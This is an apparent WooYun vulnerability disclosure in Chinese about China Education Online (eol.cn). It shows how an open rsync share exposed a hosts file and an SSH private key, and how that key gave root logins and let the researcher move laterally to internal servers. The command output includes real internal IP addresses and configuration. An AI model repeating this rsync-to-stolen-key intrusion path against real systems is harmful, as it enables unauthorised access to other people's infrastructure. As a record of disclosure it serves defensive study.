乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-10-27: 积极联系厂商并且等待厂商认领中,细节不对外公开 2013-12-11: 厂商已经主动忽略漏洞,细节向公众公开
中国教育网 www.eol.cn 由于1个服务的配置错误导致全站沦陷
rsync 211.151.94.241::gen/
cat hosts# Do not remove the following line, or various programs# that require network functionality will fail.127.0.0.1 localhost202.205.109.141 debian141.eol.cn debian141# The following lines are desirable for IPv6 capable hosts# ::1 ip6-localhost ip6-loopback# fe00::0 ip6-localnet# ff00::0 ip6-mcastprefix# ff02::1 ip6-allnodes# ff02::2 ip6-allrouters# ff02::3 ip6-allhosts## 211.151.91.98 ipvs2#166.111.204.69 wowowo172.16.0.1 switch-01172.16.0.2 switch-02172.16.0.3 switch-03172.16.1.4 switch-04202.112.0.36 kiwi67.228.174.9 cucas#202.205.109.1 rhea202.205.109.2 www.eol.cn202.205.109.3 bbs202.205.109.4 db2.eol.cn202.205.109.5 jacana202.205.109.6 butterfly db2#202.205.109.7 db1#202.205.109.8 bull202.205.109.8 crane202.205.109.9 ibis202.205.109.10 centra-2202.205.109.11 donkey2202.205.109.12 centra202.205.109.14 home202.205.109.15 deepblue202.205.109.17 Ian202.205.109.18 thorpe202.205.109.19 blue202.205.109.20 blog.edu.cn202.205.109.21 caps-2202.205.109.22 home2202.205.109.23 bluebird202.205.109.24 ceaie.edu.cn blog-2202.205.109.25 egret202.205.109.26 thorpe-2202.205.109.27 blog202.205.109.28 gaokao4202.205.109.34 ad01202.205.109.35 ad02202.205.109.37 caps202.205.109.38 ftp snoopy#202.205.109.45 hehe202.205.109.46 gaokao4202.205.109.47 home-limo202.205.109.48 eolftp202.205.109.50 node14202.205.109.51 eagle202.205.109.52 crane202.205.109.53 emu202.205.109.54 donkey202.205.109.55 bittern202.205.109.56 pause202.205.109.57 egret-2202.205.109.58 kookaburra202.205.109.59 macaw202.205.109.69 db1202.205.109.80 bigip202.205.109.97 honeyyeater202.205.109.98 jay202.205.109.99 preview.eol.cn202.205.109.100 flamingo202.205.109.101 flamingo-2202.205.109.102 preview.eol.cn202.205.109.103 flycatcher202.205.109.104 falcon202.205.109.110 goose202.205.109.111 hawk202.205.109.112 heron202.205.109.117 dove202.205.109.118 e2900-1202.205.109.119 e2900-2202.205.109.120 v240-1202.205.109.121 v240-2202.205.109.123 hummingbird202.205.109.124 hornbill202.205.109.125 bluelog202.205.109.127 boatbill202.205.109.150 bull202.205.109.155 lion202.205.109.178 rhea202.205.109.184 merganser202.205.109.190 marabou202.205.109.191 mallard202.205.109.193 motmot202.205.109.195 philomela202.205.109.209 msu202.205.11.9 break dns2202.205.11.42 giraffe202.205.11.43 snake202.205.11.69 green202.205.11.70 cyan202.205.11.71 kingfisher202.205.11.72 kingfisher-2202.205.176.34 moeweb1202.108.198.242 cvae202.205.7.57 gsy.idc202.205.7.58 idcmonitor211.151.91.97 Ian2211.151.91.98 ipvs2211.151.91.101 ipvs1211.151.91.102 alt2211.151.91.103 gaokao2211.151.91.104 bbs2#211.151.91.105 photo211.157.99.55 photonew202.205.109.210 photo211.151.91.107 free.eol.cn-2211.151.91.108 www.eol.cn-2#chisa.edu.cn211.151.90.1 media211.151.90.2 media211.151.90.3 chisaiflow211.151.90.4 fangtan211.151.90.5 realserver211.151.89.145 chisachat211.151.89.185 chisa-db211.151.89.188 magpie202.112.35.245 hehe211.142.41.140 dtmy
发现一个ssh.tgz的文件
164713 10 27 14:01 ssh2.tgz
解压缩
id_rsa id_rsa.pub
在上面的服务器里面选一个登陆
ssh -i id_rsa [email protected]ipvs2:~# ps -efUID PID PPID C STIME TTY TIME CMDroot 1 0 0 2007 ? 00:03:51 init [2]root 2 1 0 2007 ? 00:04:34 [migration/0]root 3 1 0 2007 ? 00:01:14 [ksoftirqd/0]root 4 1 0 2007 ? 00:04:25 [migration/1]ipvs2:~# ifconfigeth0 Link encap:Ethernet HWaddr 00:C0:9F:38:C1:95 inet addr:211.151.91.98 Bcast:211.151.91.111 Mask:255.255.255.240 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1915675700 errors:5 dropped:144 overruns:0 frame:3 TX packets:3921889199 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:2378780214 (2.2 GiB) TX bytes:1560078143 (1.4 GiB) Base address:0xe400 Memory:febc0000-febe0000eth1 Link encap:Ethernet HWaddr 00:C0:9F:38:C1:96 inet addr:10.0.0.98 Bcast:10.0.0.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:495776699 errors:0 dropped:180 overruns:0 frame:0 TX packets:3661157267 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:849113923 (809.7 MiB) TX bytes:1267393581 (1.1 GiB) Base address:0xe000 Memory:feba0000-febc0000lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:196550863 errors:0 dropped:0 overruns:0 frame:0 TX packets:196550863 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:117126749 (111.7 MiB) TX bytes:117126749 (111.7 MiB)history | grep ssh 5 ssh 10.0.0.39 6 ssh 10.0.0.43 8 ssh 10.0.0.43 10 ssh 10.0.0.39 11 ssh 10.0.0.43 12 ssh 10.0.0.39 14 ssh 10.0.0.43ssh 10.0.0.39Last login: Sun Sep 29 11:17:10 2013 from 10.0.0.98Linux cockatoo 2.6.18-6-686 #1 SMP Sat Dec 27 09:31:05 UTC 2008 i686The programs included with the Debian GNU/Linux system are free software;the exact distribution terms for each program are described in theindividual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extentpermitted by applicable law.cockatoo:~# ps -efUID PID PPID C STIME TTY TIME CMDroot 1 0 0 2009 ? 00:07:12 init [2]root 2 1 0 2009 ? 00:00:00 [migration/0]root 3 1 0 2009 ? 00:00:10 [ksoftirqd/0]root 4 1 0 2009 ? 00:01:13 [migration/1]root 5 1 0 2009 ? 00:01:37 [ksoftirqd/1]cockatoo:~# ifconfigeth0 Link encap:Ethernet HWaddr 00:16:35:3C:2B:E4 inet addr:10.0.0.39 Bcast:10.0.0.255 Mask:255.255.255.0 inet6 addr: fe80::216:35ff:fe3c:2be4/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:2782554477 errors:0 dropped:0 overruns:0 frame:0 TX packets:1741093814 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:344340646 (328.3 MiB) TX bytes:86728051 (82.7 MiB) Interrupt:201eth0:0 Link encap:Ethernet HWaddr 00:16:35:3C:2B:E4 inet addr:10.0.0.47 Bcast:10.0.0.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 Interrupt:201lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:36885 errors:0 dropped:0 overruns:0 frame:0 TX packets:36885 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:13680105 (13.0 MiB) TX bytes:13680105 (13.0 MiB)有个rsyncd.conf[wcmback] path = /home/wcmback comment = Apache2 Config Files hosts allow = 10.0.0.0/24 202.205.109.0/24 202.112.0.36 202.205.11.0/25 202.205.109.119[site] path = /etc/apache2/sites-enabled comment = Apache2 Config Files hosts allow = 10.0.0.0/24 202.205.109.0/24 202.112.0.36 202.205.11.0/25[teacher] path = /home/wcm/edu_cn/jiao_shi_zhao_pin_1582 comment = Whole www htdocs hosts allow = 10.0.0.0/24 202.205.109.0/24 202.112.0.36 202.205.11.0/25 121.194.3.180/255.255.255.192[conf] path = /home/ftp_test/conf comment = Whole www htdocs hosts allow = 10.0.0.0/24 202.205.109.0/24 202.112.0.36 202.205.11.0/25 121.194.3.180/255.255.255.192[new_files] path=/home/wcm/new_files comment = eol wcm files ignore errors = yes read only = no hosts allow = 10.0.0.142/32 10.0.0.143/32[eol_cn] path=/home/wcm/eol_cn comment = eol wcm files ignore errors = yes read only = no hosts allow = 10.0.0.142/32 10.0.0.143/32[new_files_images] path=/home/wcm/new_files/images/cer.net/gaokao/2011shiti comment = eol wcm files ignore errors = yes read only = no hosts allow = 10.0.0.142/32 10.0.0.143/32[new_files_zt] path=/home/wcm/new_files/zt comment = eol wcm files ignore errors = yes read only = no hosts allow = 10.0.0.142/32 10.0.0.143/32cockatoo:/home/wcm# cd eol_cn/cockatoo:/home/wcm/eol_cn# ls04_bys_zhao_pin_4407 fudao_10487 lanqiu_11735 te_jian_399204_xiaoyuan_cj_1978 fudao_10499 lao_dong_fa_yuan_4385 team_201204chun_jie_kuai_xun_1975 fudao_10511 lao_dong_he_tong_9642 teams_514904chun_jie_zhuan_ti_1974 fudao_10522 lao_dong_he_tong_jie_chu_zhong_zhi_4391 tebie_ch_410705_10_2267 fudao_10533 lao_dong_he_tong_qian_ding_bian_geng_4392 tebie_ch_452005_11_2268 fudao_10547 laow_1889 tepjs_4440
再换个机器试试
ssh -i i 121.194.3.201Last login: Sun Oct 27 14:52:07 2013 from 202.205.109.80Linux xinxi2009-01 2.6.18-6-amd64 #1 SMP Sun Feb 10 17:50:19 UTC 2008 x86_64The programs included with the Debian GNU/Linux system are free software;the exact distribution terms for each program are described in theindividual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extentpermitted by applicable law.xinxi2009-01:~# ifconfigeth2 Link encap:Ethernet HWaddr 00:23:8B:A9:AA:10 inet addr:121.194.3.201 Bcast:121.194.3.255 Mask:255.255.255.0 inet6 addr: fe80::223:8bff:fea9:aa10/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:11859164102 errors:0 dropped:0 overruns:0 frame:0 TX packets:15624895490 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:100 RX bytes:1655586719825 (1.5 TiB) TX bytes:19411809874839 (17.6 TiB) Base address:0xac00 Memory:fcde0000-fce00000eth3 Link encap:Ethernet HWaddr 00:23:8B:A9:AA:11 inet addr:118.186.63.12 Bcast:118.186.63.127 Mask:255.255.255.128 UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:98621 errors:0 dropped:0 overruns:0 frame:0 TX packets:27891 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:8199957 (7.8 MiB) TX bytes:18628920 (17.7 MiB) Base address:0xa800 Memory:fcd80000-fcda0000lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:17767291494 errors:0 dropped:0 overruns:0 frame:0 TX packets:17767291494 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:43181600100598 (39.2 TiB) TX bytes:43181600100598 (39.2 TiB)xinxi2009-01:~# iduid=0(root) gid=0(root) groups=0(root)
问题太严重了,不继续了。
安全需要很小心
未能联系到厂商或者厂商积极拒绝